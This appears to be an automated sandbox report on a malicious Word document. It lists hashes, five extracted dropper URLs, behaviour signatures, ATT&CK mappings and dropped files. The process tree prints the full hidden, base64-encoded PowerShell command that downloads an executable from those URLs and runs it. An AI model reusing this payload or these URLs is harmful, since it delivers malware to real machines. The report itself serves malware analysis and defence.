Analysis

  • max time kernel
    101s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-03-2023 00:06

General

  • Target

    VirusShare_2fe5b00079aec2d8369a798230313ec8.doc

  • Size

    125KB

  • MD5

    2fe5b00079aec2d8369a798230313ec8

  • SHA1

    e233595a2ee62f6197fcc7d9088fce3505c38ec0

  • SHA256

    8eb6805a0852b220695175ce81a5b139f1438dc06ea3fc1347b047702880374c

  • SHA512

    d9b4173274b49d7f041aea1a6866d5cc79530360668299385a10f25597b608308a5cb6502363709a7e09e43d30a1df95e1ab72fcc71852c78b51da016c2bbed7

  • SSDEEP

    3072:beKgdzSrG8KyIwLx3phgC1s0rPOWfKNR/:beKUzSLnLx3X3O0r2WfKNJ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/

exe.dropper

https://www.wenkawang.com/data/bofze0s-7ji4-15/

exe.dropper

https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/

exe.dropper

http://ma.jopedu.com/img/8z8dl-3xn-655019278/

exe.dropper

http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\VirusShare_2fe5b00079aec2d8369a798230313ec8.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:4392
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABKAGIAagBkAG0AcgBrAGYAPQAnAFcAdgB4AG8AagBqAHgAeQAnADsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAIAA9ACAAJwAzADAANgAnADsAJABHAHgAZAB1AG8AYwBkAGoAYwBqAHQAPQAnAEIAawBmAGsAYgBvAGYAaQBwAHAAYwB6AHQAJwA7ACQATQBiAGsAbQBvAG8AbgBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAKwAnAC4AZQB4AGUAJwA7ACQAVQBlAGYAYwB6AHAAYwBkAGYAaQB4AG8APQAnAFIAcQBkAGsAegBtAHkAZABtAHcAdAB3AGYAJwA7ACQASQB5AGIAbgBwAHkAdABmAGEAcABtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAaQBlAGcAbwBoAG8AbQBlAHYAYQBsAHUAZQBzAC4AYwBvAG0ALwBlAG4AZwBsAC8ANABkAGUALQBrAHoAcwB5AGgAdQAtADcANgA4ADYAMQAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB3AGUAbgBrAGEAdwBhAG4AZwAuAGMAbwBtAC8AZABhAHQAYQAvAGIAbwBmAHoAZQAwAHMALQA3AGoAaQA0AC0AMQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBiAHIAdQBpAGQAcwBmAG8AdABvAGcAcgBhAGEAZgAtAHUAdAByAGUAYwBoAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFEATAB2AEYATAB5AC8AKgBoAHQAdABwADoALwAvAG0AYQAuAGoAbwBwAGUAZAB1AC4AYwBvAG0ALwBpAG0AZwAvADgAegA4AGQAbAAtADMAeABuAC0ANgA1ADUAMAAxADkAMgA3ADgALwAqAGgAdAB0AHAAOgAvAC8AcABhAHkALgBqAG8AcABlAGQAdQAuAGMAbwBtAC8AVABoAGkAbgBrAFAASABQAC8AbAA5AG8AawBjAGcAdQBoADYALQBiADkAbgBuAHIAaAA3AC0AOQA2ADIANAA1ADUAMgA0AC8AJwAuACIAUwBgAFAATABJAFQAIgAoACcAKgAnACkAOwAkAEEAdgB2AGgAawBvAHkAZQByAD0AJwBaAGcAegBiAGQAegB5AG0AeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBjAHIAbgBkAHEAZgBtAGYAbQBlACAAaQBuACAAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAApAHsAdAByAHkAewAkAEkAeQBiAG4AcAB5AHQAZgBhAHAAbQAuACIAZABPAGAAVwBuAGwAbwBhAEQAZgBgAEkAbABlACIAKAAkAFIAYwByAG4AZABxAGYAbQBmAG0AZQAsACAAJABNAGIAawBtAG8AbwBuAGcAKQA7ACQAUAB0AGkAdQBxAHIAaQBqAGQAawBsAHYAZQA9ACcASAB3AGgAcwBtAGwAegBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQBiAGsAbQBvAG8AbgBnACkALgAiAEwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAwADMAMAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAE0AYgBrAG0AbwBvAG4AZwApADsAJABMAHMAdAB4AHMAcwBpAGEAPQAnAFkAcAB5AGgAdgBoAGgAdwAnADsAYgByAGUAYQBrADsAJABWAG4AYQBzAGIAZgBmAG0AbwBxAD0AJwBDAG0AZwBxAHAAZwBzAHMAbgBkAGkAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAGwAcgBlAHIAdgB6AGgAaQA9ACcAQgB2AG4AbQB2AG0AcABhAGQAbgBsAGIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1544

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\306.exe
      Filesize

      60KB

      MD5

      c024c953ec332e5442ddf792e2317cb0

      SHA1

      5c1231594e38209ca346f31503d852a4602bd9fc

      SHA256

      ff42059791f1f33377aaa95399ff09d9a9d61e816045cc8fc34ba4b51ac8c38f

      SHA512

      89d739e4ae016576e09ea6fd8261236f15f43a3ef5d622572b6e065d8f221ee3337d4ff75319a87b72469e8fabe7555316d40c863f417a22b2d824f3478a963b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\871C8B46.wmf
      Filesize

      444B

      MD5

      6af85a4853d82ee3ef6658fc78522688

      SHA1

      a291c969a5705e2d10c823d1a41d19de95c97ebb

      SHA256

      8b44075d064bfd4534a8a543af18f2d18f112c7e37270d42040107b95ef9c670

      SHA512

      3045f89192f91fb25d24d71337bb76055b6576ecbc8a8879eb81008c7b4329c0d93bdd10202686635487d133cdacb4c5c61060f155b6848a5a0a37b16f1b86ef

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkllcqxy.wnp.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1288-138-0x00007FF8CD1D0000-0x00007FF8CD1E0000-memory.dmp
      Filesize

      64KB

    • memory/1288-134-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-133-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-139-0x00007FF8CD1D0000-0x00007FF8CD1E0000-memory.dmp
      Filesize

      64KB

    • memory/1288-136-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-153-0x0000018BE6490000-0x0000018BE6690000-memory.dmp
      Filesize

      2.0MB

    • memory/1288-246-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-135-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-247-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-137-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-245-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1288-189-0x0000018BE6490000-0x0000018BE6690000-memory.dmp
      Filesize

      2.0MB

    • memory/1288-244-0x00007FF8CF230000-0x00007FF8CF240000-memory.dmp
      Filesize

      64KB

    • memory/1544-179-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-192-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-191-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-190-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-178-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-180-0x0000020F5E860000-0x0000020F5E870000-memory.dmp
      Filesize

      64KB

    • memory/1544-166-0x0000020F5E8B0000-0x0000020F5E8D2000-memory.dmp
      Filesize

      136KB